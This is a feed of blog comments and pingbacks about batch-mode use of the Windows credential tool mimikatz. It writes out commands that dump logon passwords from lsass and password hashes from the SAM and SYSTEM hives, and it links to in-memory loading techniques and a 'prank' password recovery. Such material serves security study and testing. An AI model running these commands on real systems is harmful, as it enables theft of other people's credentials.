Par : YURETS
version 2.0 alpha cannot work in batch mode: mimikatz.exe > result.txt is not working dumpas.txt content: privilege::debug inject::process lsass.exe sekurlsa.dll sekurlsa::logonPasswords full...
View ArticlePar : gentilkiwi
it's an alpha ! but you don't read docs ;) <code>mimikatz privilege::debug sekurlsa::logonPasswords exit > results.txt</code> even in <code>mimikatz</code> 1.0 : <ul>...
View ArticlePar : YURETS
Ok, I understand, but input file with commands recognize only first string, in version 1.0 processed all rows. Why ?
View ArticlePar : gentilkiwi
args separated by space… no need for rows. By the way, mimikatz does not support input file, only args are supported.
View ArticlePar : YURETS
mimikatz.exe privilege::debug sekurlsa::logonPasswords exit >> result.txt This work !!!! Thanx.
View ArticlePar : Reflective DLL Injection with PowerShell | clymb3r
[...] initial goal was to be able to run a tool like Mimikatz (http://blog.gentilkiwi.com/mimikatz) without ever writing to disk, but there are plenty of other [...]
View ArticlePar : [Intermédiaire] Récupérer un mot de passe Windows avec Mimikatz |...
[...] Pour lui faire une petite farce ludique, nous avons besoin dans un premier temps d’une clé USB (ou une carte SD) sur laquelle nous allons mettre Mimikatz (code disponible ici). [...]
View ArticlePar : Modifying Mimikatz to be Loaded Using Invoke-ReflectiveDLLInjection.ps1...
[...] Mimikatz Website: http://blog.gentilkiwi.com/mimikatz [...]
View ArticlePar : YURETS
What batch command for dump hashes in 2.0 alpha ? mimikatz.exe samdump::hashes c:\windows\system32\config\system c:\windows\system32\config\sam >> hashdump.txt hangs
View ArticlePar : YURETS
mimikatz # samdump::hashes ERROR mimikatz_doCommandeLocale ; « samdump » module not found !
View ArticlePar : YURETS
Ok, exit added (1.0), batch-file now is: mimikatz.exe samdump::hashes c:\windows\system32\config\system c:\windows\system32\config\sam exit >> hashdump.txt but not working. content hashdump.txt:...
View ArticlePar : YURETS
This batch-file mimikatz.exe privilege::debug samdump::hashes exit >> hashdump.txt again access denied: mimikatz 1.0 x86 (RC) /* Traitement du Kiwi (Jan 23 2013 00:13:21) */ //...
View ArticlePar : Metasploit: Postexploitation – Passwort im Klartext auslesen |...
[...] http://blog.gentilkiwi.com/mimikatz [...]
View ArticlePar : 本机Windows密码查看神器-mimikatz |千行站
[...] 偶然发现一个查看windows密码的神器: mimikatz, 只需要3步就能搞定. [...]
View Article